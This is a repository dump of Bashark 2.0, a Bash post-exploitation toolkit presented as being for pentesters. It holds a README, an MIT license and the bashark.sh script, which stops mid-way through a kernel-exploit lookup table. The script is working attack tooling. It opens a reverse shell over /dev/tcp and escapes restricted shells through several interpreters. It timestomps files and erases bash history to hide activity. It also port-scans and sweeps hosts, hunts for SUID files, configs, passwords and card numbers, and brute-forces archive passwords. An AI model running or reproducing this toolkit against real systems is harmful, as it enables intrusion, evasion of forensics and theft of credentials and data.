├── README.md ├── LICENSE └── bashark.sh /README.md: -------------------------------------------------------------------------------- 1 |

Bashark 2.0



3 | 4 | Bashark 5 | 6 |


9 | Post-exploitation toolkit 10 |

11 | 12 | ![Language](https://img.shields.io/badge/Language-Bash-blue.svg?longCache=true&style=flat-square) ![License](https://img.shields.io/badge/License-MIT-red.svg?longCache=true&style=flat-square) ![Version](https://img.shields.io/badge/Version-2.0-green.svg?longCache=true&style=flat-square) 13 | 14 | Bashark aids pentesters and security researchers during the post-exploitation phase of a security audit. 15 | 16 | ## Usage 17 | To launch this tool on a compromised host, simply source the `bashark.sh` script from a terminal: 18 | 19 | `$ source bashark.sh` 20 | 21 | Then type `help` to see the help menu. 22 | 23 | ## License 24 | This software is released under the [MIT License](https://en.wikipedia.org/wiki/MIT_License) 25 | 26 | 27 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 redcodelabs.io 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /bashark.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | version="2.0" 3 | 4 | red=`tput setaf 1` 5 | green=`tput setaf 2` 6 | yellow=`tput setaf 3` 7 | blue=`tput setaf 4` 8 | magenta=`tput setaf 5` 9 | grey=`tput setaf 8` 10 | reset=`tput sgr0` 11 | bold=`tput bold` 12 | underline=`tput smul` 13 | 14 | 15 | echo ' 16 | __________ .__ __ ________ _______ 17 | \______ \_____ _____| |__ _____ _______| | __ ___ __ \_____ \ \ _ \ 18 | | | _/\__ \ / ___/ | \\__ \\_ __ \ |/ / \ \/ / / ____/ / /_\ \ 19 | | | \ / __ \_\___ \| Y \/ __ \| | \/ < \ / / \ \ \_/ \ 20 | |______ /(____ /____ >___| (____ /__| |__|_ \ \_/ /\ \_______ \ /\ \_____ / 21 | \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ 22 | 23 | ' 24 | printf "\n" 25 | echo "[*] Type 'help' to show available commands" 26 | printf "\n" 27 | 28 | files_to_delete=() 29 | dirs_to_delete=() 30 | cleanup="on" 31 | active_hosts=() 32 | 33 | print_good(){ 34 | echo "${green}[+]${reset}" $1 35 | } 36 | print_error(){ 37 | echo "${red}[x]${reset}" $1 38 | } 39 | print_info(){ 40 | echo "[*]" $1 41 | } 42 | print_question(){ 43 | echo "[?]" $1 44 | } 45 | command_error_exit(){ 46 | echo "${red}${bold}[LAST CMD ERROR:$?]${reset}" 47 | } 48 | 49 | root_check(){ 50 | if [[ $UID -ne 0 ]] 51 | then 52 | print_error 'You need to be root to run this command' 53 | echo 54 | exit 1 55 | fi 56 | } 57 | 58 | PS1="${bold}bashark_$version${reset}$ " 59 | export PS1 60 | 61 | if [ "$(uname)" == "Darwin" ]; then 62 | platform="osx" 63 | elif [ "$(uname)" == "Linux" ]; then 64 | platform="linux" 65 | fi 66 | 67 | 68 | 
#################COMMANDS################### 69 | usrs(){ 70 | if [[ "$@" =~ .*-h.* ]]; then 71 | echo " 72 | ${underline}USAGE:${reset} 73 | usrs [-h] 74 | ${underline}DESCRIPTION:${reset} 75 | Enumerate all local users and highlight currently logged-in" 76 | else 77 | current_user=`whoami` 78 | all_users=`cut -d: -f1 /etc/passwd` 79 | print_info "List of users:" 80 | echo "${all_users//$current_user/${green}${bold}*$current_user${reset}}" 81 | fi 82 | } 83 | 84 | getapp(){ 85 | if [[ "$@" =~ .*-h.* ]]; then 86 | echo " 87 | ${underline}USAGE:${reset} 88 | getapp [-h] [FILTER] 89 | ${underline}OPTIONAL ARGUMENTS:${reset} 90 | FILTER Show installed apps that match the filter (ex. getapp sql) 91 | ${underline}DESCRIPTION:${reset} 92 | Enumerate all installed applications" 93 | else 94 | IFS=: read -ra dirs_in_path <<< "$PATH" 95 | for dir in "${dirs_in_path[@]}"; do 96 | for file in "$dir"/*; do 97 | if [ $# -eq 0 ]; then 98 | [[ -x $file && -f $file ]] && print_good "${bold}${file##*/}${reset} is installed" 99 | else 100 | filter=$1 101 | if [[ $file =~ $filter ]]; then 102 | [[ -x $file && -f $file ]] && print_good "${bold}${file##*/}${reset} is installed" 103 | fi 104 | fi 105 | done 106 | done 107 | fi 108 | } 109 | 110 | revshell(){ 111 | arguments_errors=0 112 | if [[ "$@" =~ .*-h.* ]]; then 113 | echo " 114 | ${underline}USAGE:${reset} 115 | revshell [-h] HOST PORT 116 | ${underline}POSITIONAL ARGUMENTS:${reset} 117 | HOST Address of the listening host 118 | PORT Port to connect with 119 | ${underline}DESCRIPTION:${reset} 120 | Send a reverse shell to remote host" 121 | else 122 | if [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then 123 | host=$1 124 | else 125 | print_error "Wrong IP address format" 126 | ((arguments_errors++)) 127 | fi 128 | if [ "$2" -eq "$2" ] 2>/dev/null; then 129 | port=$2 130 | else 131 | print_error "Wrong port format: integer required" 132 | ((arguments_errors++)) 133 | fi 134 | if [ $arguments_errors = 0 ]; then 
135 | print_good "Started reversed shell (${host}:${port})" 136 | revshell_cmd="bash -i >& /dev/tcp/${host}/${port} 0>&1" 137 | eval "$revshell_cmd" 138 | fi 139 | fi 140 | 141 | } 142 | 143 | quit(){ 144 | if [[ "$@" =~ .*-h.* ]]; then 145 | echo " 146 | ${underline}USAGE:${reset} 147 | quit [-h] 148 | ${underline}DESCRIPTION:${reset} 149 | Exit Bashark, clean history and execute cleanup routine" 150 | else 151 | print_info "Starting cleanup routine" 152 | fls=$(echo $files_to_delete | tr ":" "\n") 153 | drs=$(echo $dirs_to_delete | tr ":" "\n") 154 | print_info "Removing bash history" 155 | cat /dev/null > ~/.bash_history && history -c 156 | print_info "Started file cleanup routine" 157 | removed_files=0 158 | removed_dirs=0 159 | for file in ${fls[*]}; do 160 | rm $file 161 | ((removed_files++)) 162 | done 163 | for dir in ${drs[*]}; do 164 | rmdir $dir 165 | ((removed_dirs++)) 166 | done 167 | print_info "Removed ${bold}${removed_files}${reset} files" 168 | print_info "Removed ${bold}${removed_dirs}${reset} directories" 169 | fi 170 | } 171 | 172 | timestomp(){ 173 | if [[ "$@" =~ .*-h.* ]]; then 174 | echo " 175 | ${underline}USAGE:${reset} 176 | timestomp DATE FILE 177 | ${underline}POSITIONAL ARGUMENTS:${reset} 178 | DATE Set the date to spoof (ex. 20170322) 179 | FILE File to timestomp 180 | ${underline}DESCRIPTION:${reset} 181 | Change attributes of a file (access, modify, change)." 
182 | else 183 | if [ $# -eq 0 ]; then 184 | print_error "Specify DATE and FILE" 185 | elif [ $# -eq 1 ]; then 186 | print_error "Specify FILE" 187 | else 188 | date=$1 189 | file_to_modify=$2 190 | filename=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 10 | head -n 1) 191 | touch -d $date $filename 192 | touch -r $filename $file_to_modify 193 | rm $filename 194 | print_good "Succesfully timestomped ${file_to_modify}" 195 | fi 196 | fi 197 | } 198 | 199 | portscan(){ 200 | opened_ports=0 201 | if [[ "$@" =~ .*-h.* ]]; then 202 | echo " 203 | ${underline}USAGE:${reset} 204 | portscan [-h] HOST 205 | ${underline}POSITIONAL ARGUMENTS:${reset} 206 | HOST Host to scan 207 | ${underline}DESCRIPTION:${reset} 208 | Simple portscanner that shows if most popular ports are opened" 209 | else 210 | if [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then 211 | host=$1 212 | if [[ `ping -c 2 ${host}` =~ .*Unreachable.* ]]; then 213 | print_error "Host (${host}) is unreachable" 214 | else 215 | ports=(5 7 18 20 21 22 23 25 29 37 42 43 49 53 69 70 79 80 103 108 109 216 | 110 115 118 119 137 139 143 150 156 161 179 190 194 197 389 396 443 444 445 217 | 458 546 547 563 569 1080) 218 | for port in ${ports[*]}; do 219 | (echo >/dev/tcp/$host/$port) &>/dev/null 220 | if [ $? 
-eq 0 ]; then 221 | print_good "$host:$port is ${green}opened${reset}" 222 | ((opened_ports++)) 223 | fi 224 | done 225 | fi 226 | if [ $opened_ports = 0 ]; then 227 | print_error "No ports opened" 228 | fi 229 | else 230 | print_error "Wrong IP address format" 231 | fi 232 | fi 233 | } 234 | 235 | 236 | i(){ 237 | if [[ "$@" =~ .*-h.* ]]; then 238 | echo " 239 | ${underline}USAGE:${reset} 240 | i [-h] 241 | ${underline}DESCRIPTION:${reset} 242 | Show information about compromised host" 243 | else 244 | star="${bold}${grey}<${reset}${magenta}${bold}*${reset}${bold}${grey}>${reset}" 245 | root_usrs=`grep 'x:0:' /etc/passwd` 246 | 247 | OS=`uname -s` 248 | REV=`uname -r` 249 | MACH=`uname -m` 250 | 251 | GetVersionFromFile() 252 | { 253 | VERSION=`cat $1 | tr "\n" ' ' | sed s/.*VERSION.*=\ // ` 254 | } 255 | 256 | if [ "${OS}" = "SunOS" ] ; then 257 | OS=Solaris 258 | ARCH=`uname -p` 259 | OSSTR="${OS} ${REV}(${ARCH} `uname -v`)" 260 | elif [ "${OS}" = "AIX" ] ; then 261 | OSSTR="${OS} `oslevel` (`oslevel -r`)" 262 | elif [ "${OS}" = "Linux" ] ; then 263 | KERNEL=`uname -r` 264 | if [ -f /etc/redhat-release ] ; then 265 | DIST='RedHat' 266 | PSUEDONAME=`cat /etc/redhat-release | sed s/.*\(// | sed s/\)//` 267 | REV=`cat /etc/redhat-release | sed s/.*release\ // | sed s/\ .*//` 268 | elif [ -f /etc/SuSE-release ] ; then 269 | DIST=`cat /etc/SuSE-release | tr "\n" ' '| sed s/VERSION.*//` 270 | REV=`cat /etc/SuSE-release | tr "\n" ' ' | sed s/.*=\ //` 271 | elif [ -f /etc/mandrake-release ] ; then 272 | DIST='Mandrake' 273 | PSUEDONAME=`cat /etc/mandrake-release | sed s/.*\(// | sed s/\)//` 274 | REV=`cat /etc/mandrake-release | sed s/.*release\ // | sed s/\ .*//` 275 | elif [ -f /etc/debian_version ] ; then 276 | DIST="Debian `cat /etc/debian_version`" 277 | REV="" 278 | 279 | fi 280 | if [ -f /etc/UnitedLinux-release ] ; then 281 | DIST="${DIST}[`cat /etc/UnitedLinux-release | tr "\n" ' ' | sed s/VERSION.*//`]" 282 | fi 283 | 284 | OSSTR="${OS} ${DIST} 
${REV}(${PSUEDONAME} ${KERNEL} ${MACH})" 285 | 286 | fi 287 | 288 | os=${OSSTR} 289 | super_users=`grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'` 290 | if [[ "$root_usrs" =~ "$(whoami)" ]]; then 291 | is_root="(${green}Root privilleges${reset})" 292 | else 293 | is_root="(${red}No root privilleges${reset})" 294 | fi 295 | local_ip=`ip address | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1'` 296 | global_ip=`wget http://ipecho.net/plain -O - -q ; echo` 297 | if [ `cat /proc/sys/kernel/randomize_va_space` = "2" ]; then 298 | aslr="${red}Enabled${reset} (data segment randomization)" 299 | elif [ `cat /proc/sys/kernel/randomize_va_space` = "1" ]; then 300 | aslr="${yellow}Enabled${reset}" 301 | else 302 | aslr="${green}Disabled${reset}" 303 | fi 304 | if [ `cat /proc/sys/kernel/dmesg_restrict` = "1" ]; then 305 | dmesg_restrict="${red}Enabled${reset} (data segment randomization)" 306 | elif [ `cat /proc/sys/kernel/dmesg_restrict` = "0" ]; then 307 | dmesg_restrict="${green}Disabled${reset}" 308 | fi 309 | if [ `cat /proc/sys/kernel/perf_event_paranoid` = "-1" ]; then 310 | perf_paranoid="${green}Disabled${reset}" 311 | elif [ `cat /proc/sys/kernel/perf_event_paranoid` = "0" ]; then 312 | perf_paranoid="${yellow}Enabled${reset} (restricted raw tracepoint access)" 313 | elif [ `cat /proc/sys/kernel/perf_event_paranoid` = "1" ]; then 314 | perf_paranoid="${red}Enabled${reset} (restricted CPU events access)" 315 | elif [ `cat /proc/sys/kernel/perf_event_paranoid` = "2" ]; then 316 | perf_paranoid="${red}Enabled${reset} (restricted kernel profiling)" 317 | fi 318 | 319 | host="127.0.0.1" 320 | opened_ports=() 321 | ports=(5 7 18 20 21 22 23 25 29 37 42 43 49 53 69 70 79 80 103 108 109 322 | 110 115 118 119 137 139 143 150 156 161 179 190 194 197 389 396 443 444 445 323 | 458 546 547 563 569 1080 5432 4444 5555) 324 | for port in ${ports[*]}; do 325 | (echo >/dev/tcp/$host/$port) &>/dev/null 326 | if [ $? 
-eq 0 ]; then 327 | opened_ports+=$port, 328 | fi 329 | done 330 | if [ ${#opened_ports} = 0 ]; then 331 | opened_ports="${red}None${reset}" 332 | fi 333 | echo " 334 | ${star}Username : ${bold}$(whoami)${reset} ${is_root} 335 | ${star}User Groups : $(groups $(whoami)) 336 | ${star}Super users : ${super_users} 337 | ${star}Hostname : $(hostname) 338 | ${star}OS : $os 339 | ${star}Kernel : $(uname -r) 340 | ${star}Arch : $(uname -m) 341 | ${star}Local IP : ${local_ip} 342 | ${star}Global IP : ${global_ip} 343 | ${star}RAM 344 | $(cat /proc/meminfo |grep MemTotal) 345 | $(cat /proc/meminfo |grep MemFree) 346 | $(cat /proc/meminfo |grep SwapTotal) 347 | ${star}Opened Ports : ${green}${opened_ports}${reset} 348 | ${star}Kernel configuration: 349 | * ASLR : ${aslr} 350 | * DMESG_RESTRICT: ${dmesg_restrict} 351 | * PERF_PARANOID : ${perf_paranoid} 352 | " 353 | fi 354 | } 355 | 356 | c(){ 357 | if [[ "$@" =~ .*-h.* ]]; then 358 | echo " 359 | ${underline}USAGE:${reset} 360 | c [-h] 361 | ${underline}DESCRIPTION:${reset} 362 | Clear screen" 363 | else 364 | clear 365 | fi 366 | } 367 | 368 | _(){ 369 | if [[ "$@" =~ .*-h.* ]]; then 370 | echo " 371 | ${underline}USAGE:${reset} 372 | _ [-h] 373 | ${underline}DESCRIPTION:${reset} 374 | Go back to previous directory (alias of 'cd ..')" 375 | else 376 | cd .. 
377 | fi 378 | } 379 | 380 | getconf(){ 381 | not_found=0 382 | if [[ "$@" =~ .*-h.* ]]; then 383 | echo " 384 | ${underline}USAGE:${reset} 385 | getconf [-h] [-v] 386 | ${underline}OPTIONAL ARGUMENTS:${reset} 387 | -v Show contents of config files (verbose mode) 388 | ${underline}DESCRIPTION:${reset} 389 | Enumerate and show configuration files" 390 | else 391 | confiles=("/etc/master.passwd" "/etc/group" "/etc/hosts" "/etc/crontab" 392 | "/etc/sysctl.conf" "/etc/ssh/ssh_config" 393 | "/etc/ssh/sshd_config" "/etc/resolv.conf" "/etc/syslog.conf" "/etc/chttp.conf" 394 | "/etc/lighttpd.conf" "/etc/cups/cupsd.confcda" "/etc/inetd.conf" "/opt/lampp/etc/httpd.conf" 395 | "/etc/samba/smb.conf" "/etc/openldap/ldap.conf" "/etc/ldap/ldap.conf" "/etc/exports" "/etc/auto.master" 396 | "/etc/auto_master" "/etc/fstab" "/etc/cpufreq-bench.conf" "/etc/dhcpcd.conf" "/etc/dnsmasq.conf" "/etc/fuse.conf" 397 | "/etc/gai.conf" "/etc/healthd.conf" "/etc/host.conf" "/etc/i3status.conf" 398 | "/etc/krb5.conf" "/etc/ld.so.conf" "/etc/libao.conf" "/etc/locale.conf" "/etc/logrotate.conf" 399 | "/etc/ltrace.conf" "/etc/makepkg.conf" "/etc/man_db.conf" "/etc/mdadm.conf" "/etc/mke2fs.conf" 400 | "/etc/mkinitcpio.conf" "/etc/modules.conf" "/etc/mpd.conf" "/etc/netconfig") 401 | 402 | for file in ${confiles[*]}; do 403 | if [ ! 
-f $file ]; then 404 | : 405 | else 406 | if [[ "$@" =~ .*-v.* ]]; then 407 | print_good "Found ${magenta}${file}${reset}:" 408 | cat $file 409 | printf "\n" 410 | else 411 | print_good "Found ${magenta}${file}${reset}" 412 | ((found++)) 413 | fi 414 | fi 415 | done 416 | if [[ $found = 0 ]]; then 417 | print_error "No configuration files found" 418 | fi 419 | fi 420 | } 421 | 422 | cleanup(){ 423 | if [[ "$@" =~ .*-h.* ]]; then 424 | echo " 425 | ${underline}USAGE:${reset} 426 | cleanup [-h] [on|off] 427 | ${underline}DESCRIPTION:${reset} 428 | When enabled, the cleanup routine deletes on exit every new file or folder created during Bashark session" 429 | else 430 | if [ $# -eq 0 ]; then 431 | if [[ $cleanup == "on" ]]; then 432 | print_info "Cleanup routine is ${green}${bold}ENABLED${reset}" 433 | else 434 | print_info "Cleanup routine is ${yellow}${bold}DISABLED${reset}" 435 | fi 436 | elif [ $1 == "on" ]; then 437 | cleanup="on" 438 | print_info "Cleanup routine is ${green}${bold}ENABLED${reset}" 439 | elif [ $1 == "off" ]; then 440 | cleanup="off" 441 | print_info "Cleanup routine is ${yellow}${bold}DISABLED${reset}" 442 | else 443 | print_error "No such option" 444 | fi 445 | fi 446 | } 447 | 448 | t(){ 449 | if [[ "$@" =~ .*-h.* ]]; then 450 | echo " 451 | ${underline}USAGE:${reset} 452 | t [-h] [TOUCH_COMMAND_ARGUMENTS] 453 | ${underline}DESCRIPTION:${reset} 454 | Alias of 'touch' command that respects current cleanup routine settings" 455 | else 456 | touch $1 $2 $3 $4 $5 $6 $7 $8 $9 457 | if [[ "$cleanup" == "on" ]]; then 458 | files_to_delete+=`readlink -f $1`: 459 | fi 460 | print_info "Created ${bold}$1${reset} (${red}${bold}$(date '+%X')${reset})" 461 | fi 462 | } 463 | 464 | hosts(){ 465 | if [[ "$@" =~ .*-h.* ]]; then 466 | echo " 467 | ${underline}USAGE:${reset} 468 | hosts [-h] 469 | ${underline}DESCRIPTION:${reset} 470 | Enumerate active hosts in background" 471 | else 472 | for ip in $(seq 1 255); do 473 | ping -c 1 192.168.1.$ip>/dev/null; [ $? 
-eq 0 ] && printf "\n192.168.1.$ip is ${green}${bold}active${reset}\r" || : ; done & 474 | fi 475 | } 476 | 477 | isvm(){ 478 | if [[ "$@" =~ .*-h.* ]]; then 479 | echo " 480 | ${underline}USAGE:${reset} 481 | isvm [-h] 482 | ${underline}DESCRIPTION:${reset} 483 | Check if OS is running on virtual machine" 484 | else 485 | if ls -di --color=never /|grep -vqe "^2.*/$"; then 486 | print_info "Running in chroot" 487 | fi 488 | if grep -q "^flags.*hypervisor" /proc/cpuinfo; then 489 | print_info "Host is running on a Virtual Machine" 490 | else 491 | print_info "Host is not a Virtual Machine" 492 | fi 493 | fi 494 | } 495 | 496 | fnd(){ 497 | if [[ "$@" =~ .*-h.* ]]; then 498 | echo " 499 | ${underline}USAGE:${reset} 500 | fnd [-h] [-v] PATTERN 501 | ${underline}DESCRIPTION:${reset} 502 | Search for regex occurrence in current directory" 503 | else 504 | if [[ "$@" =~ .*-v.* ]]; then 505 | grep -rGnw '.' -e "${@: -1}" 506 | else 507 | grep -rGlw '.' -e "${@: -1}" 508 | fi 509 | fi 510 | 511 | } 512 | 513 | mkd(){ 514 | if [[ "$@" =~ .*-h.* ]]; then 515 | echo " 516 | ${underline}USAGE:${reset} 517 | mkd [-h] [ARGUMENTS] 518 | ${underline}DESCRIPTION:${reset} 519 | Alias of 'mkdir' command that respects current cleanup routine settings" 520 | else 521 | mkdir $1 $2 $3 $4 $5 $6 $7 $8 $9 522 | if [[ "$cleanup" == "on" ]]; then 523 | dirs_to_delete+=`readlink -f $1`: 524 | fi 525 | print_info "Created ${bold}$1${reset} (${red}${bold}$(date '+%X')${reset})" 526 | fi 527 | } 528 | 529 | esc(){ 530 | if [[ "$@" =~ .*-h.* ]]; then 531 | echo " 532 | ${underline}USAGE:${reset} 533 | esc [-h] 534 | ${underline}DESCRIPTION:${reset} 535 | Spawn a non-restricted shell" 536 | else 537 | if hash awk 2>/dev/null; then 538 | awk 'BEGIN {system("/bin/sh")}' 539 | elif hash python 2>/dev/null; then 540 | python -c 'import pty; pty.spawn("/bin/sh")' 541 | elif hash ruby 2>/dev/null; then 542 | ruby -e 'exec "/bin/sh"' 543 | elif hash perl 2>/dev/null; then 544 | perl -e 'exec("sh -i");' 
545 | else 546 | print_error "No interpreter found for shell escaping" 547 | fi 548 | fi 549 | } 550 | 551 | mex(){ 552 | if [[ "$@" =~ .*-h.* ]]; then 553 | echo " 554 | ${underline}USAGE:${reset} 555 | mx [-h] FILE 556 | ${underline}POSITIONAL ARGUMENTS:${reset} 557 | FILE File to add permissions 558 | ${underline}DESCRIPTION:${reset} 559 | Add executive permissions to a file" 560 | else 561 | if [ $# -eq 0 ]; then 562 | print_error "Specify the file" 563 | elif [ ! -f $1 ]; then 564 | print_error "File does not exist" 565 | else 566 | chmod a=x $1 567 | print_good "$1 is executable" 568 | fi 569 | fi 570 | } 571 | 572 | lg(){ 573 | if [[ "$@" =~ .*-h.* ]]; then 574 | echo " 575 | ${underline}USAGE:${reset} 576 | lg [-h] REGEX 577 | ${underline}POSITIONAL ARGUMENTS:${reset} 578 | REGEX Regular expression to search in listed files 579 | ${underline}DESCRIPTION:${reset} 580 | This command searches for occurrence of specified regular expression in filenames of the current directory 581 | Alias of 'ls|grep -E '" 582 | else 583 | if [ $# -eq 0 ]; then 584 | print_error "Specify the regular expression" 585 | else 586 | ls|grep -E $1 587 | fi 588 | fi 589 | } 590 | 591 | 592 | getperm(){ 593 | if [[ "$@" =~ .*-h.* ]]; then 594 | echo " 595 | ${underline}USAGE:${reset} 596 | getperm [-h] [-g] [-u] [-sb] [-c] [-wd] [-ed] [-wed] [-wf] [-nf] [DIRECTORY] 597 | ${underline}OPTIONAL ARGUMENTS:${reset} 598 | -g Search for SGID (chmod 2000) 599 | -u Search for SUID (chmod 4000) 600 | -sb Search for sticky bit 601 | -c Search for SGID and SUID in most common places (/bin, /sbin, /usr/bin, etc.) 
602 | -wd Search for world-writeable directories 603 | -ed Search for world-executable directories 604 | -wed Search for both executable and writeable directories 605 | -wf Search for world-writeable files 606 | -nf Search for no-owner files 607 | [DIRECTORY] Directory to search instead of the current one 608 | ${underline}DESCRIPTION:${reset} 609 | Search for advanced linux file permissions in the current directory. You need to specify at least 610 | one optional argument." 611 | else 612 | if [ $# -eq 0 ]; then 613 | print_error "Specify at least one option" 614 | else 615 | dir="." 616 | if [[ "${@: -1}" =~ .*-.* ]]; then 617 | : 618 | else 619 | dir="${@: -1}" 620 | fi 621 | if [[ "$@" =~ .*-g.* ]]; then 622 | print_good "SGID files:" 623 | find ${dir} -perm -g=s -type f 2>/dev/null 624 | fi 625 | if [[ "$@" =~ .*-u.* ]]; then 626 | print_good "SUID files:" 627 | find ${dir} -perm -u=s -type f 2>/dev/null 628 | fi 629 | if [[ "$@" =~ .*-sb.* ]]; then 630 | print_good "Sticky bit files:" 631 | find ${dir} -perm -1000 -type d 2>/dev/null 632 | fi 633 | if [[ "$@" =~ .*-c.* ]]; then 634 | print_good "Results from common places:" 635 | for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done 636 | fi 637 | if [[ "$@" =~ .*-wd.* ]]; then 638 | print_good "World-writeable directories:" 639 | find ${dir} -perm -222 -type d 2>/dev/null 640 | fi 641 | if [[ "$@" =~ .*-ed.* ]]; then 642 | print_good "World-executable directories:" 643 | find ${dir} -perm -o x -type d 2>/dev/null 644 | fi 645 | if [[ "$@" =~ .*-wed.* ]]; then 646 | print_good "World-executable and writeable directories:" 647 | find ${dir} \( -perm -o w -perm -o x \) -type d 2>/dev/null 648 | fi 649 | if [[ "$@" =~ .*-wf.* ]]; then 650 | print_good "World-writeable files:" 651 | find ${dir} -xdev -type d \( -perm -0002 -a ! 
-perm -1000 \) -print 652 | fi 653 | if [[ "$@" =~ .*-nf.* ]]; then 654 | print_good "Files with no owner:" 655 | find ${dir} -xdev \( -nouser -o -nogroup \) -print 656 | fi 657 | fi 658 | fi 659 | } 660 | 661 | fileinfo(){ 662 | if [[ "$@" =~ .*-h.* ]]; then 663 | echo " 664 | ${underline}USAGE:${reset} 665 | fileinfo [-h] FILE 666 | ${underline}POSITIONAL ARGUMENTS:${reset} 667 | FILE File to inspect 668 | ${underline}DESCRIPTION:${reset} 669 | Get information about specified file" 670 | else 671 | if [ $# -eq 0 ]; then 672 | print_error "Specify the file to inspect" 673 | elif [ ! -f $1 ]; then 674 | print_error "No such file" 675 | else 676 | if [[ -x "$1" ]]; then 677 | executable="${green}yes${reset}" 678 | else 679 | executable="${red}no${reset}" 680 | fi 681 | echo " 682 | ${green}*${reset}NAME: $1 683 | ${green}*${reset}CREATION DATE: $(stat -c %y $1| sed 's/^\([0-9\-]*\).*/\1/') 684 | ${green}*${reset}SIZE: $(stat --printf="%s" $1) bytes 685 | ${green}*${reset}EXECUTABLE: ${executable} 686 | ${green}*${reset}ENCODING: $(file -bi $1) 687 | " 688 | fi 689 | fi 690 | } 691 | 692 | fndre(){ 693 | #TODO FINISH 694 | if [[ "$@" =~ .*-h.* ]]; then 695 | echo " 696 | ${underline}USAGE:${reset} 697 | fndre [-h] FILE 698 | ${underline}POSITIONAL ARGUMENTS:${reset} 699 | FILE File to inspect 700 | ${underline}DESCRIPTION:${reset} 701 | Search for most popular regexes in a file (gmail and ip addresses, plaintext passwords, credit cards etc.)" 702 | else 703 | if [ $# -eq 0 ]; then 704 | print_error "Specify the file to inspect" 705 | elif [ ! 
-f $1 ]; then 706 | print_error "No such file" 707 | else 708 | filename=$1 709 | declare -A regexes 710 | regexes[IP_addresses]="^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$" 711 | regexes[MAC_addresses]="(?:[0-9a-fA-F]:?){12}" 712 | regexes[Gmail_addresses]="\s.*@gmail.com" 713 | regexes[Plaintext_passwords]="[Pp]assword\s*[:=-].*\s" 714 | regexes[Usernames]="[Uu]ser\s*[:=-].*\s" 715 | regexes[Mastercard_regex]="[51-55]\d{14}" 716 | regexes[Visa_regex]="4\d{15}|4\d{12}" 717 | regexes[Discover_regex]="6011\d{12}|65\d{14}" 718 | regexes[AmericanExpress_regex]="34\d{13}|37\d{13}" 719 | regexes[DinersClub_regex]="[300-305]/d{11}|36/d{12}|38/d{12}" 720 | regexes[JCB_regex]="35\d{14}|2131\d{11}|1800\d{11})" 721 | 722 | for key in ${!regexes[@]}; do 723 | #echo $regexes[$key] 724 | print_good "$key search results:" 725 | re=$regexes[$key] 726 | grep -oE "$re" $filename 727 | done 728 | fi 729 | fi 730 | } 731 | 732 | 733 | bruteforce(){ 734 | if [[ "$@" =~ .*-h.* ]]; then 735 | echo " 736 | ${underline}USAGE:${reset} 737 | bruteforce [-h] DICTIONARY FILE 738 | ${underline}POSITIONAL ARGUMENTS:${reset} 739 | FILE File to bruteforce 740 | DICTIONARY Dictionary to use 741 | ${underline}DESCRIPTION:${reset} 742 | Bruteforce a file with a password" 743 | else 744 | if [ $# -eq 0 ]; then 745 | print_error "Specify the dictionary" 746 | fi 747 | if [ $# -eq 1 ]; then 748 | print_error "Specify the file to bruteforce" 749 | elif [ ! -f $1 ]; then 750 | print_error "No such dictionary" 751 | elif [ ! 
-f $2 ]; then 752 | print_error "No such file" 753 | else 754 | dictionary=$1 755 | filename=$2 756 | cracked=0 757 | for word in $(cat $dictionary); do 758 | if [ ".zip" in $filename ]; then 759 | out=$(unzip -R $word $filename) 760 | if [ "inflating" in $out ]; then 761 | print_good "Found password: $green$bold$word$reset" 762 | (($cracked++)) 763 | break 764 | else 765 | : 766 | fi 767 | elif [ ".rar" in $filename ]; then 768 | out=$(rar x -p"$word" $filename 1>/dev/null 2>/dev/null) 769 | success=`echo $?` 770 | if [ "$success" = 0 ]; then 771 | print_good "Found password: $green$bold$word$reset" 772 | (($cracked++)) 773 | break 774 | else 775 | : 776 | fi 777 | fi 778 | done 779 | if [ $cracked = 0 ]; then 780 | print_error "Password not found. Try another dictionary" 781 | fi 782 | fi 783 | fi 784 | 785 | } 786 | 787 | cve(){ 788 | if [[ "$@" =~ .*-h.* ]]; then 789 | echo " 790 | ${underline}USAGE:${reset} 791 | cve [-h] 792 | ${underline}DESCRIPTION:${reset} 793 | Search for kernel exploits" 794 | else 795 | hits=0 796 | declare -A exploits 797 | exploits=( ["2.4.20|2.2.24|2.4.25|2.4.26|2.4.27"]="CVE-2004-0077" 798 | ["2.4.29"]="CVE-2004-1235" 799 | ["2.6.34|2.6.35|2.6.36"]="caps_to_root (https://github.com/SecWiki/linux-kernel-exploits/blob/master/2004/caps_to_root/15916.c)" 800 | ["2.6.5|2.6.7|2.6.8|2.6.9|2.6.10|2.6.11"]="CVE-2005-0736" 801 | ["2.6.13|2.6.14|2.6.15|2.6.16|2.6.17"]="CVE-2006-2451" 802 | ["2.6.8|2.6.10|2.6.11|2.6.12|2.6.13|2.6.14|2.6.15|2.6.16"]="CVE-2006-3626" 803 | 